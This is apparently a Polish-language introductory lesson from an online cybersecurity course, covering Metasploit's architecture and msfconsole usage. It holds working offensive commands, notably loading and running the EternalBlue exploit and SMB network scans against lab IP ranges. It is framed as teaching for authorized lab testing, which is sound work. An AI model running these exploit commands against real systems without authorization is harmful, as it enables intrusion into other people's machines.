0Pricing
Cyber Security Academy · Lekcja

Architektura Metasploit i msfconsole

Nauczą się Państwo poruszać po msfconsole, poznają strukturę exploitów, payloadów i modułów oraz skonfigurują opcje.

Architektura Metasploit i msfconsole to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 1 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Czym jest Metasploit?

Metasploit Framework to platforma open source do testów penetracyjnych, zapewniająca ujednolicony interfejs do tworzenia, testowania i uruchamiania exploitów. Jest standardowym w branży narzędziem do autoryzowanego wykorzystywania podatności w środowiskach laboratoryjnych.

Komponenty Metasploit

Najważniejsze komponenty to: msfconsole (interaktywny interfejs wiersza poleceń), msfvenom (generator payloadów), Metasploit DB (PostgreSQL do przechowywania hostów i sesji) oraz Armitage (graficzny interfejs).

Uruchamianie msfconsole

Uruchom msfconsole i zainicjalizuj bazę danych. Monit zmieni się na msf6 >. Uzupełnianie za pomocą klawisza Tab działa dla wszystkich poleceń, nazw modułów i opcji.

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

Typy modułów

Metasploit porządkuje funkcje według typów modułów: exploit (kod ataku przeznaczony dla konkretnej podatności), payload (kod uruchamiany po wykorzystaniu podatności), auxiliary (skanery i fuzzery), post (moduły po uzyskaniu dostępu), encoder oraz nop.

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

Wyszukiwanie modułów

Polecenie search filtruje moduły według nazwy, CVE, platformy lub rangi. Ranga modułu wskazuje jego niezawodność: Excellent > Great > Good > Normal > Average > Low.

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

Korzystanie z modułu exploit

Wybierz moduł za pomocą use, wyświetl wymagane opcje poleceniem show options, ustaw wartości za pomocą set, a następnie uruchom moduł poleceniem run lub exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

Ustawianie opcji globalnych

setg ustawia opcje globalnie dla wszystkich kolejnych modułów — jest to przydatne w przypadku LHOST, LPORT i RHOSTS, które pozostają niezmienne przez cały czas trwania testu.

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

Moduły auxiliary

Moduły auxiliary wykonują skanowanie, enumerację i fuzzing bez dostarczania payloadów. Przykłady to skaner wersji SMB, narzędzie do brute force logowania SSH oraz skaner katalogów HTTP.

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

Zarządzanie obszarami roboczymi

Obszary robocze porządkują dane ze skanowania i sesje według testu. Na początku każdej oceny utwórz nowy obszar roboczy, aby zachować rozdzielenie danych.

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

Integracja z Nmap

Importuj wyniki skanowania Nmap w formacie XML bezpośrednio do bazy danych Metasploit, aby wypełnić tabele hostów i usług oraz umożliwić wybór odpowiednich modułów.

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

Pomoc i dokumentacja

Każdy moduł ma wbudowaną dokumentację. Użyj polecenia info, aby przeczytać opis modułu, ocenę niezawodności, odwołania (CVE i biuletyny) oraz wymagane opcje.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

Szybki sprawdzian

Które polecenie wybiera moduł w msfconsole?

Podsumowanie: architektura Metasploit

msfconsole to centralny interfejs: służy do wyszukiwania modułów, ustawiania opcji, uruchamiania exploitów i zarządzania sesjami. Zawsze pracuj w nazwanym obszarze roboczym, importuj wyniki Nmap, aby wypełnić bazę danych, i czytaj informacje o module przed jego uruchomieniem — rozumiej, co i dlaczego uruchamiasz.

Często zadawane pytania

Czy lekcja „Architektura Metasploit i msfconsole” jest bezpłatna?

Tak — pełny tekst „Architektura Metasploit i msfconsole” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Architektura Metasploit i msfconsole”?

Nauczą się Państwo poruszać po msfconsole, poznają strukturę exploitów, payloadów i modułów oraz skonfigurują opcje. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 1 z 4.

Ile czasu zajmuje lekcja „Architektura Metasploit i msfconsole”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Architektura Metasploit i msfconsole
  2. Wykorzystanie znanej podatności
  3. Payloady: staged, stageless i Meterpreter
  4. Po uzyskaniu dostępu: pivoting i utrzymanie dostępu
← Powrót do Cyber Security Academy